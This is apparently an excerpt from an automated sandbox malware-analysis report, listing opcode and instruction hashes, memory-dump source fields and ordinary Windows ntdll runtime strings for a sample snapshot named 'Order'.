                                                                • Instruction ID: 426f099100687ffbc369572af9db63b1252df62ea177cc8fb1ce6d0105ac7d2a
                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                • Instruction Fuzzy Hash: F4E01A31010A52EFE7366F2ADD5CB56BBE5BFA0711F18CC2DA19A124B1C7B699C1CA40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                • Instruction ID: 6cf55c0cefb573d0ef7edc112d377cf0c929667e2007cc56049ff4c61e4d49ad
                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                • Instruction Fuzzy Hash: 3CE0C2343003058FE715CF19C040B627BB6BFD9A20F28C068A9488F205EB37E852CB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73ad3cecaf4d3ce85ca437532b487213198711e6aab7b483a8fac5a9d669be3b
                                                                • Instruction ID: b15f50e31464df9ff593eb59db2632aedeaea107ffc8c502270c7379a66c1189
                                                                • Opcode Fuzzy Hash: 73ad3cecaf4d3ce85ca437532b487213198711e6aab7b483a8fac5a9d669be3b
                                                                • Instruction Fuzzy Hash: 98D02B325810717ACB37F119BC08F933A9D9B80220F06CC64F30C92121D564FC8593D4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                • Instruction ID: 04751b5c4c0f41a56cb93a6d5242ce21906c9ce2e642604f9ee4499cd95aa59e
                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                • Instruction Fuzzy Hash: 03E0CD31400A11DFD7323F26DE44F9176A9FF58B51F144C1EE189150A8C7745C81CB54
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 951679c5e80be9923d5e82dd47a88b4acb6054382369cafc26004800f40ad218
                                                                • Instruction ID: ee9cda239281693e7ed723aad0e9892f6d64002c04d655313d3d8f11586432ff
                                                                • Opcode Fuzzy Hash: 951679c5e80be9923d5e82dd47a88b4acb6054382369cafc26004800f40ad218
                                                                • Instruction Fuzzy Hash: C1E0C2332005A06BC311FB6DDD60F8A739EEFE4A60F004125F199972A0CA20AD01C795
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                • Instruction ID: 5d6b13eb1414845c7c5691ad73775eac6052ce38044627743918a904c429e04c
                                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                • Instruction Fuzzy Hash: D6E08633111A1497C728DE18D515B7277A8EF45720F09463EA61747780C534E548C794
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                • Instruction ID: 482ab9901f828ae268c03ab023bda5501073e86d806427c5f19c76977828a6ca
                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                • Instruction Fuzzy Hash: E6D05E36511A50AFC3329F1BEA00C13BBF9FBC4A51705062EA54983924C670A806CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction ID: 47676140fd1bc10dbdbb512617677f24a00faaad7ac703acedce7efcfbb6be0f
                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction Fuzzy Hash: ECD0A932614A20ABD732AB2CFC00FC333E8BB88721F060459B008C7050C3A0AC81CA84
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                • Instruction ID: a282679e3b7a487ded2a4a8db6b1487154c6b873480abee7b840efcc22c51030
                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                • Instruction Fuzzy Hash: 9BE0EC759506849BDF12DF59D640F5ABBB9BBD4B40F150058B548AB661C624A900CB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction ID: dd727162ac315d72c423517f2b9c99346c905c92e42aae54e4090a7affb2e3a0
                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction Fuzzy Hash: 12D0223222607093CB2857656A40FA36909EBC1A91F0A002D780EA3800C0058C42C2E0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                • Instruction ID: bdffbe8ee926f8a00cc6ffcf84c29b5cbeb116d6ada30ef340c2d1f973b44f08
                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                • Instruction Fuzzy Hash: 33D012771E054DBBCB119F66DC01F957BA9E7A4BA0F448020B908875A0C63AE950D584
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bb696e2c9226de28562f7a82824d1df39d0c23e9941de2302bb5fef7e93c711
                                                                • Instruction ID: 59ad234a01710130f24b19a403913b5dee600be32cceb3b122736a128067be61
                                                                • Opcode Fuzzy Hash: 5bb696e2c9226de28562f7a82824d1df39d0c23e9941de2302bb5fef7e93c711
                                                                • Instruction Fuzzy Hash: 7FD0A734951105DBDF1ACF18C520E2E3674FB50641B40406CF70451422E329EC01C700
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction ID: 5f3f8536ea37caae1c0bcf260d79fbbe44c135bddcb212ece335c5bf78348b72
                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction Fuzzy Hash: C3D0C935613E80CFD61BCF0CC5A4B1533B8BB84B45F8944A0F505CBB22D62CD940CA00
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction ID: 29ebfb9d0ea561d293538cf252646000af9db9149072b5384f51699fe11d0233
                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction Fuzzy Hash: F3C01232150644AFC7119B95CD01F0177A9E798B40F004021F60447570C531E910D644
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction ID: b81f6e6228eb216722d2caa64cc63300720c1693db0aa58bb94191cd9780c0b8
                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction Fuzzy Hash: E6D01236200249EFCB02DF41C890D9A776AFBD8710F149019FD19076118A75ED62DA50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction ID: 476964f3ac39e042c218edc967f8645dec62a72671c34b0a617a22792781d7d3
                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction Fuzzy Hash: FDC048B9701A428FCF16DB2ED694F5977E8FB84741F154890E809CBB22E624E901CA11
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cfd37f77b761cd955e0a50c774c10c6d6a8a9562ca7abfee85b6e82ea3c18ad
                                                                • Instruction ID: 90a67dc84f7443a3187427702e2ce36bdb66b3a6b91323f07ce66ca6b4c50c0b
                                                                • Opcode Fuzzy Hash: 1cfd37f77b761cd955e0a50c774c10c6d6a8a9562ca7abfee85b6e82ea3c18ad
                                                                • Instruction Fuzzy Hash: 48900232645800139140715848845465005A7E1341F56C011E0424554CCB188A565361
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6460140f52404ab0efa645085082ef38cbe9b98fb5122044c5eb2509a7ec83b0
                                                                • Instruction ID: e923d445d9671b0cbc2680af7410aa89fb95eb0286986b9700694128ddb38d94
                                                                • Opcode Fuzzy Hash: 6460140f52404ab0efa645085082ef38cbe9b98fb5122044c5eb2509a7ec83b0
                                                                • Instruction Fuzzy Hash: 5C900262641500434140715848044067005A7E2341796C115A0554560CC71C89559369
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7f633010c632e00afd78586a6db35b24a29a2897842c41c6463e89a4ebca3d8
                                                                • Instruction ID: ea52d1b6f93d6e1c3c67a6e31ca4173957c2b84a032e428277294e672d8be0e1
                                                                • Opcode Fuzzy Hash: d7f633010c632e00afd78586a6db35b24a29a2897842c41c6463e89a4ebca3d8
                                                                • Instruction Fuzzy Hash: 9390023264540803D15071584414746100597D1341F56C011A0024654DC7598B5577A1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88440734a6275f5a1693b9b36e07e45eac696170a8095ea11e720abe8656eb2a
                                                                • Instruction ID: edaed866382397cab54567f0484b2fec293bb1949f1b56a7768a35c0c13f0649
                                                                • Opcode Fuzzy Hash: 88440734a6275f5a1693b9b36e07e45eac696170a8095ea11e720abe8656eb2a
                                                                • Instruction Fuzzy Hash: F190023224140803D10471584804686100597D1341F56C011A6024655ED76989917231
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a6698daabf9ebb3a7c073173e7492474e13bfa6afc19196cbe71e574877f6b0
                                                                • Instruction ID: 19644b899d94b34082bf2a32823c1fed8d898c60811e08361ae83cd18d987f60
                                                                • Opcode Fuzzy Hash: 2a6698daabf9ebb3a7c073173e7492474e13bfa6afc19196cbe71e574877f6b0
                                                                • Instruction Fuzzy Hash: 4290023224544843D14071584404A46101597D1345F56C011A0064694DD7298E55B761
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f727d81580817d9408b4b38dde22060ca7267919cfaf7d112505780c41952364
                                                                • Instruction ID: 874aa16f6e2c65a35b322f53d57b132e1bda51902d1d5760cd5858f015bd1cdc
                                                                • Opcode Fuzzy Hash: f727d81580817d9408b4b38dde22060ca7267919cfaf7d112505780c41952364
                                                                • Instruction Fuzzy Hash: 1290023224140803D1807158440464A100597D2341F96C015A0025654DCB198B5977A1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3030e4e52b8cda8e35b470b134b04c32682ebed12fe3470b658c138873ee8759
                                                                • Instruction ID: 506d58333e8f20bd3b37c530c3da58df85f81207b801a484e840c7a38e128481
                                                                • Opcode Fuzzy Hash: 3030e4e52b8cda8e35b470b134b04c32682ebed12fe3470b658c138873ee8759
                                                                • Instruction Fuzzy Hash: AE9002A2241540934500B2588404B0A550597E1241F56C016E1054560CC62989519235
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ef12d3695622bc428b2ca97329b937538b9807b5f1af3dc037aa919ec8c2b85
                                                                • Instruction ID: b3bf212deb2804132673b6437ed2a72ff9bc1ceda215decd8688b13b2d77b284
                                                                • Opcode Fuzzy Hash: 6ef12d3695622bc428b2ca97329b937538b9807b5f1af3dc037aa919ec8c2b85
                                                                • Instruction Fuzzy Hash: EB900226261400030145B558060450B1445A7D7391796C015F1416590CC72589655321
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb61f44895182cc3a6570ee9812658f1e9e1b2fc7fca155bee383e4dae589be6
                                                                • Instruction ID: 8ac0d7d99754cafcd714c2f0cb3de11a9441cb57fd7c1d173466406975f0566b
                                                                • Opcode Fuzzy Hash: eb61f44895182cc3a6570ee9812658f1e9e1b2fc7fca155bee383e4dae589be6
                                                                • Instruction Fuzzy Hash: AD900437351400030105F55C07045071047D7D73D1757C031F1015550CD735CD715331
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
                                                                • Instruction ID: f75557a43c5a2d002eb99f3932c69ea744233197c77d0ab437034ea51b81a5c1
                                                                • Opcode Fuzzy Hash: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
                                                                • Instruction Fuzzy Hash: AE90023228140403D141715844046061009A7D1281F96C012A0424554EC7598B56AB61
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
                                                                • Instruction ID: d99e4d556c6a9cdc856b84c28b455678babd248c23eb017ecb910e8c47697bf5
                                                                • Opcode Fuzzy Hash: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
                                                                • Instruction Fuzzy Hash: B9900222282441535545B15844045075006A7E1281B96C012A1414950CC62A9956D721
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
                                                                • Instruction ID: 170774d2fdab3f11ef6338a47f6a207c798833e9629073896544c5897c613966
                                                                • Opcode Fuzzy Hash: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
                                                                • Instruction Fuzzy Hash: B890022234140003D140715854186065005E7E2341F56D011E0414554CDA1989565322
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A34787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A34725
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A34655
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A34742
                                                                • Execute=1, xrefs: 01A34713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A346FC
                                                                • ExecuteOptions, xrefs: 01A346A0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
                                                                • Instruction ID: 660ba29c23666c8fbbb86a3962f85e168db890a60ec2ace250fe59af2f838236
                                                                • Opcode Fuzzy Hash: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
                                                                • Instruction Fuzzy Hash: B25128316002197BEF25ABE8EC85FAA77BCAF58305F0400ADE709A71D1E7719A458F51
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: 5cfc98526af225bf66ed0a71c961fffa7f6403347a9d23c665b0a6756f8c15bb
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: A9021571508342AFDB05CF28C590A6BBBF5EFC8704F04892DF9999B264DB31E985CB52
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: c075bf17525724de2f2cf6854a49e987d4cc26c8aac243e0bc1016a04e5fdda9
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 2E81B138E062498EEF2BCF6CEA507BEBBB1AF45310F1C4559D851A72D1C73499408B71
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
                                                                • Instruction ID: 7d8d14bd58121c674941eb05248833b5c00fb2b0984de0c38ba8be1404775d3d
                                                                • Opcode Fuzzy Hash: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
                                                                • Instruction Fuzzy Hash: 0121627AA00259ABDB11DF79ED40AFEBBF8FF54650F040126EA45E3241E730DA018BA1
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 01A3031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A302BD
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A302E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
                                                                • Instruction ID: bfd79673e99b809377f634e424c53fe81ec60ba13ac740b3f286ae6bb1bd8d07
                                                                • Opcode Fuzzy Hash: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
                                                                • Instruction Fuzzy Hash: 0FE1C0306047419FE726CF28C988B2ABBE4BF88714F140A5EF5A9CB2E1D775D945CB42
                                                                Strings
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A37B7F
                                                                • RTL: Resource at %p, xrefs: 01A37B8E
                                                                • RTL: Re-Waiting, xrefs: 01A37BAC
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
                                                                • Instruction ID: efef770dc234e9771f9c56b044d9ad82039aa1fa306a45e1f439633180195512
                                                                • Opcode Fuzzy Hash: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
                                                                • Instruction Fuzzy Hash: 0541EF35704702AFD725DE29C940F6AB7E5EF88721F000A1DFA5B9B680DB31E8058B91
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A3728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 01A372A3
                                                                • RTL: Re-Waiting, xrefs: 01A372C1
